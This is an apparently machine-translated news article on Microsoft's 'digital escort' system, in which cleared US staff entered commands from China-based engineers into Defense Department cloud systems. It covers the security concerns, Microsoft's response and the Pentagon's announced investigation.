On July 15, it was revealed that Microsoft had been using Chinese engineers to remotely maintain the U.S. Department of Defense computer system for nearly a decade, but only "Digital Escorts" with limited technical capabilities executed the instructions on its behalf, allowing Chinese hackers to take advantage of the situation. After the news broke, U.S. Secretary of Defense Pete Hegseth said that a two-week investigation had been launched into the matter.
The "Digital Guard" system was only exposed in the past decade, and even the Ministry of National Defense did not know about it
This system originated ten years ago. In order to win the US government cloud contract, Microsoft proposed a "compromise plan" to let overseas engineers from China and other countries be responsible for maintaining the technology, and then American personnel holding security clearances from the US Department of Defense would input commands on their behalf. They were called "Digital Escorts."
Microsoft has outsourced Insight Global and ASM Research to recruit security guards, most of whom are veterans or have only security clearances. Their hourly wages start at $18. Their technical skills are limited and they cannot identify whether it is a malicious program. A current security guard revealed:
"We have to handle hundreds of requests from Chinese engineers every month, and we have to prevent data from being "leaked", but technical training can't make up for the gap. Even if suspicious instructions are discovered, it is actually impossible to see afterwards. We can only believe that these engineers did not do anything bad."
This system has been in operation for many years and is quite low-key. Even the U.S. Department of Defense Information Systems Agency (DISA) said that "no one knows about this."
Chinese hacker threats continue, experts say it's more dangerous than TikTok
The Office of the Director of National Intelligence (ODNI) has always regarded China as the most active source of hacker threats. In 2023, Chinese hackers even hacked into the cloud mailboxes of senior US government officials and stole 60,000 State Department emails.
Harry Coker, a former CIA and NSA executive, said after seeing the guard system:
"If I were a Chinese intelligence agent, this would be a perfect opportunity for infiltration."
He stressed that this is much more serious than the espionage concerns about TikTok or Chinese students. John Sherman, former Chief of Information of the Department of Defense, was also surprised to hear about this:
"I should have known about this, and DISA and the U.S. Cyber Command should review it."
Some experts have warned that Chinese law allows the government to obtain data from companies or citizens as long as it is deemed to be for "legitimate purposes." In other words, Microsoft employees in China may be asked to provide information to intelligence agencies at any time, making the protection system meaningless.
How does Guard work?
The following is the operation process of "Digital Guard":
Chinese engineers put forward maintenance requirements: Chinese Microsoft engineers open demand documents, such as firewall maintenance, checking system records, etc.
US digital guards receive orders: US local guards will hold meetings and discussions with Chinese engineers.
The guards copied the instructions: Chinese engineers gave the computer instructions to the guards, who then entered them directly into the Ministry of Defense's cloud system.
The security guard cannot distinguish the content of the code: If there is a script called "fix_servers.sh", but it is actually a malicious program, the security guard will not be able to distinguish it.
Matthew Erickson, a Microsoft engineer who participated in the design of the system, admitted that the guards only "know a little bit of technology" at most, and the real maintenance work still has to rely on overseas engineers. The guards only ensure that overseas engineers cannot see passwords or personal information.
Why is there such a system?
The U.S. Department of Defense stipulates that people who handle sensitive information must be U.S. citizens or green card holders. However, Microsoft's team is spread all over the world, with a large number of engineers in China, India, and Europe. It is too costly to temporarily hire a large number of American engineers.
At that time, Microsoft's "FedRAMP lobbyist" Indy Crowley lobbied the government, saying that the cloud maintenance risk was no greater than that of other government suppliers. The Department of Defense once asked to simply hire American engineers directly, but Crowley refused because the cost would make the government's cloud transformation too expensive to do. In the end, Microsoft adopted the Guardian system as the most cost-effective and labor-saving solution, which could meet the Department of Defense's regulations without spending a lot of money.
(Note: FedRAMP is a standardized program promoted by the U.S. federal government that provides a unified security assessment, authorization, and continuous monitoring mechanism for cloud products and services used by government agencies to ensure that these cloud services meet security standards.)
Insiders warned, but were ignored by top management
There were actually people within Microsoft who opposed the system, believing that the security risks were too high, but Tom Keane, then head of the cloud platform, pushed for the system because it would help expand the business quickly. Those who opposed it eventually left, and the guard system was put into place. After that, Microsoft security executives warned that the guard system had loopholes, and that overseas engineers could know the details of the U.S. federal cloud, but the guards could not find any problems at all. These warnings still did not change the company's decision.
Microsoft says it no longer uses Chinese engineers to support defense systems
After the controversy was exposed, Microsoft claimed that it did not allow its Chinese engineers to "directly contact the national defense system" but only provided instructions. The guards had complete technical training and cooperated with monitoring. The company also emphasized that there was also an internal review process called "Lockbox", but the details were not disclosed.
Microsoft President Brad Smith also mentioned at a Senate hearing in May that the company was "removing Chinese nationals from government agencies," but did not explain how they gained access to these systems in the first place. Microsoft spokesman Frank Shaw also tweeted (X) on July 19:
"No Chinese engineers will provide technical assistance to the U.S. defense cloud and related services."
U.S. Secretary of Defense Pete Hegseth also tweeted (X) on July 19 regarding this matter:
"We will launch a two-week investigation to ensure that Chinese engineers are completely withdrawn from the Department of Defense's cloud services and that Chinese nationals are no longer allowed to participate. We will also continue to monitor and counter military infrastructure and cyber threats."
This article: Does the U.S. military rely on Chinese engineers for remote maintenance of its cloud? Microsoft's "Digital Guard" is targeted by the U.S. Department of Defense. It first appeared in Chain News ABMedia.